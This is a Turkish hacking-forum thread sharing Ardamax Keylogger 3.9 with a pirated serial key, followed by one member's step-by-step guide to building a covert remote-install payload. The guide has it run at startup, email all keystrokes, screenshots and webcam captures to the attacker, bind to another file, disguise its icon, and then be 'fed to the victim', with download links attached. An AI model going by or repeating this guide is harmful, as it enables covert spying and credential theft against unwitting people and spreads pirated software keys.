Ardamax Keyloger 3.9 Yeni sürüm ve Serial

burak12aa

Yeni üye
28 Tem 2010
10
0
Ardamax Keylogger - CNET Download.com

bu downloadınız dı kurdukdan sonra alt taki ikondan kayıt kodu girilmeli.

kayıt serial:

Name: h3d1und 3r1k
SE: 206B-2A3B-91A2

Daha önce paylaşıldımı bilmiyorum aradım ama bulamadım pek emin değilim ama bu konu umarım formu kirletmekden çok yararlı kılar...

Positive Energy

Yeni üye
27 Ağu 2011
16
0
herşeyi tamamlayıp sağ alttaki ikondan Uzaktan Kurulum seçeneğine tıkladığımızda Tam Sürümü Yükleyin diyor... ?

snezana

Yeni üye
17 Nis 2012
4
0
herşeyi tamamlayıp sağ alttaki ikondan Uzaktan Kurulum seçeneğine tıkladığımızda Tam Sürümü Yükleyin diyor... ?

bende orda takıldım bilen varmı acaba.registration diyor.full sürüm olmayınca uzaktan kuruluma izin vermiyor.eski verdsiyonunda böyle bi sorun yoktu. bilen varsa lütfen

berky55

Üye
5 Ağu 2012
237
0
26
Öncelikle Herkese Selamlar :)
*Arkadaslar Ardamax Keylogger 3.9 tamamen 3.7 nin aynısıdır ancak bir üst versiyonudur .

*İlk olarak indirdiğimiz winrar içindeki dosyamızı masaüstüne çıkarıyoruz .

*Çıkarttığımız full_akl adlı setupumuza tıklıyoruz .

*İlk olarak sağ altta çıkan not defteri gibi simgemizi tıklıyoruz ve kayıt kodunu girin diyoruz .

*Kayıt kodu olarak size verdiğim winrar dosyası içindeki kayıt kodunu giriyoruz ve devam ediyoruz .

*Basarı ile olusturuldu yazısı çıktıktan sonra tekrar sağ alttan bu sefer uzaktan kurulum diyoruz. *

*Çıkan yönergelere next diyoruz .

*Ardından önümüze bir tablo çıkacak.

*Hepsi ( ? ) İşaretli Olsun İleri Deyin.

*Şifre Değiştir Çıkarsa . Şifre Koyun.

*Hepsi ( ? ) İşaretli Olsun İleri Deyin.

*Başlangıçta Çalıştır Deyin. İleri Deyin.

*Tüm Kayıtları Gönder Deyin. Oradan Gün Dakika Ayarlayabilirsiniz.

*E-Mail Soracak Sizden

- Alıcıya E-mailinizi Yazın

- Kullanıcı Adına E-mailinizi Yazın

- Şifrenizi Yazın.

- Başka Birşeye Ellemeyin İleri Deyin.

- Garanti Olsun Diye Test Edebilirsiniz. TEST Tuşuna Basın Ve E-mailinizi Kontrol Edin.

*İleri Deyin.

*Ekran Görüntüsü Alma. Ayarlayabilirsiniz Kendinize Göre.

*WebCam Görüntüsü Alma Ayarlayabilirsiniz Kendinize Göre.

*Ve Sonuna Geldik Sayılır.

*Hangi Dosyayla Birleştireceğinizi Seçiniz.

*İkon Değiştirebilirsiniz.

*İleri Deyin Ve Sona Tıklayın.

Kurduğunuz
Artık Bunu Kurbana Yedirebilirsiniz...

Virüstotal Sonucu : https://tik.lat/5k3ti

İndirme Linki :
https://tik.lat/e7VVo

Arkadaslar daha önce paylasıldımı bilmiyorum ancak size bir derleme yapmıs oldum :)

Not * : Serial dosyanın içindedir .
*Virüstotalde bulunan virüsler her keyloggerda olmalıdır bunu unutmayınki viürssüz keylogger olmaz çünkü keylogger kendi basına bir virüs .
*Keyloggerı diyelimki kendi bilgisayarımızda actık korkmayınız
: Ctrl+Alt+Shift+h Yaptığınızda keyloggerimiz sağ kösede yine not defteri gibi gözükecektir ordan çıkıs yapmanız yeterlidir ...

Modlarımızdan incelemek isteyen olursa inceleyebilir
Sizlere keyloggerımızdan bir screenshot : https://tik.lat/tEFzt

Herkese İyi Forumlar . Daha önceden verildiyse affola :)

Buyrun Full Sürümdür Uzaktan Kurulumda Hata Vermiyor

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.